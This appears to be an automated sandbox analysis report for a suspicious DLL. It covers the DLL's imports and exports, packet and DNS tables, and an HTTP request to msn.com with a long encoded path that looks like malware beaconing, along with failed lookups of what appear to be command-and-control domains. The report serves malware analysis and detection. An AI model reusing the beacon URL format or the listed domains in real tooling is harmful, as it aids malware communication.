KERNEL32.dll  LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll    CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll   acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

Exports

Name        Ordinal  Address
BeGrass     1        0x10016020
Fieldeight  2        0x100162f0
Often       3        0x10016510
Townenter   4        0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 12, 2021 00:50:46.383085012 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.383264065 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.383400917 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.389113903 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.389153004 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.703313112 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.703394890 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.706571102 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.706589937 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.706839085 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.929090977 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:46.932966948 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.933007002 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:46.978180885 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:47.019146919 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:47.091273069 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:47.091360092 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:47.103151083 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:47.108998060 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:47.109036922 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:47.109047890 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:47.109065056 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:47.109095097 CEST  49759        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:47.109102011 CEST  443          49759      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:59.905160904 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:59.905235052 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:50:59.905407906 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:59.916407108 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:50:59.916452885 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.122654915 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.122772932 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.126184940 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.126225948 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.126672029 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.331165075 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.331262112 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.620603085 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.663161039 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.739191055 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.739284992 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:00.739386082 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.741317987 CEST  49766        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:51:00.741343021 CEST  443          49766      13.82.28.61    192.168.2.3
Oct 12, 2021 00:51:27.829962969 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:27.830005884 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:27.831302881 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:27.831747055 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:27.831760883 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.345242977 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.345370054 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.350394011 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.350404978 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.350694895 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.353148937 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.395128012 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.521780968 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.521857977 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.521950960 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.522217035 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.522236109 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.522434950 CEST  49779        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:51:28.522449970 CEST  443          49779      40.97.161.50   192.168.2.3
Oct 12, 2021 00:51:28.552305937 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.552341938 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.553409100 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.554908991 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.554927111 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.659035921 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.659148932 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.663799047 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.663817883 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.664269924 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.668565989 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.698314905 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.698421001 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.698537111 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.698973894 CEST  49782        443        192.168.2.3    52.98.207.210
Oct 12, 2021 00:51:28.698997974 CEST  443          49782      52.98.207.210  192.168.2.3
Oct 12, 2021 00:51:28.726995945 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.727035046 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.727166891 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.728127003 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.728147984 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.835772038 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.836008072 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.839567900 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.839591026 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.839824915 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.842505932 CEST  49783        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:51:28.883135080 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.896899939 CEST  443          49783      40.101.60.226  192.168.2.3
Oct 12, 2021 00:51:28.897229910 CEST  443          49783      40.101.60.226  192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897412062 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897692919 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897708893 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897897959 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897907972 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.616982937 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.617027998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.617142916 CEST49816443192.168.2.340.97.161.50

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2021 00:50:46.328675985 CEST | 49572 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:50:46.346757889 CEST | 53 | 49572 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:50:47.112384081 CEST | 60823 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:50:59.810003996 CEST | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:50:59.828058004 CEST | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:00.767441988 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:07.697834969 CEST | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:07.716279984 CEST | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:22.258112907 CEST | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:22.279072046 CEST | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:27.808382034 CEST | 60982 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:27.828670979 CEST | 53 | 60982 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:28.527216911 CEST | 64367 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:28.549596071 CEST | 53 | 64367 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:28.705688000 CEST | 51539 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:28.724781990 CEST | 53 | 51539 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:42.597249031 CEST | 63490 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:42.614928007 CEST | 53 | 63490 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:43.307075024 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:43.325108051 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:43.469110966 CEST | 61120 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:43.486862898 CEST | 53 | 61120 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:51:49.150876999 CEST | 53079 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:51:49.169133902 CEST | 53 | 53079 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:52:04.028712988 CEST | 53569 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:52:04.047215939 CEST | 53 | 53569 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:52:09.192166090 CEST | 62855 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:52:09.213083982 CEST | 53 | 62855 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 12, 2021 00:50:46.328675985 CEST | 192.168.2.3 | 8.8.8.8 | 0xe703 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:50:47.112384081 CEST | 192.168.2.3 | 8.8.8.8 | 0xc12d | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:50:59.810003996 CEST | 192.168.2.3 | 8.8.8.8 | 0xaba | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:00.767441988 CEST | 192.168.2.3 | 8.8.8.8 | 0x1d9c | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:07.697834969 CEST | 192.168.2.3 | 8.8.8.8 | 0xf9f2 | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:22.258112907 CEST | 192.168.2.3 | 8.8.8.8 | 0x27cb | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.808382034 CEST | 192.168.2.3 | 8.8.8.8 | 0x171f | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.527216911 CEST | 192.168.2.3 | 8.8.8.8 | 0x2f20 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.705688000 CEST | 192.168.2.3 | 8.8.8.8 | 0x6abe | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.597249031 CEST | 192.168.2.3 | 8.8.8.8 | 0xe44a | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.307075024 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd71 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.469110966 CEST | 192.168.2.3 | 8.8.8.8 | 0x8ed1 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:49.150876999 CEST | 192.168.2.3 | 8.8.8.8 | 0xc5f5 | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:52:04.028712988 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b6f | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:52:09.192166090 CEST | 192.168.2.3 | 8.8.8.8 | 0x2e04 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 12, 2021 00:50:46.346757889 CEST | 8.8.8.8 | 192.168.2.3 | 0xe703 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:50:47.130182028 CEST | 8.8.8.8 | 192.168.2.3 | 0xc12d | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:50:56.123812914 CEST | 8.8.8.8 | 192.168.2.3 | 0x703e | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:50:59.828058004 CEST | 8.8.8.8 | 192.168.2.3 | 0xaba | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:00.784550905 CEST | 8.8.8.8 | 192.168.2.3 | 0x1d9c | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:07.716279984 CEST | 8.8.8.8 | 192.168.2.3 | 0xf9f2 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:22.279072046 CEST | 8.8.8.8 | 192.168.2.3 | 0x27cb | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:27.828670979 CEST | 8.8.8.8 | 192.168.2.3 | 0x171f | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.98.207.210 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.220.18 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.147.178 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.549596071 CEST | 8.8.8.8 | 192.168.2.3 | 0x2f20 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.212.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.60.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.149.242 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:28.724781990 CEST | 8.8.8.8 | 192.168.2.3 | 0x6abe | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:42.614928007 CEST | 8.8.8.8 | 192.168.2.3 | 0xe44a | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.98.207.210 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.151.18 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.325108051 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd71 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.151.66 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.60.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.124.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.98.171.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:43.486862898 CEST | 8.8.8.8 | 192.168.2.3 | 0x8ed1 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.62.34 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:51:49.169133902 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5f5 | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:52:04.047215939 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b6f | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:52:09.213083982 CEST | 8.8.8.8 | 192.168.2.3 | 0x2e04 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49759 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:50:46 UTC | 0 | OUT | GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 22:50:47 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:50:46 GMT
Connection: close
Content-Length: 379
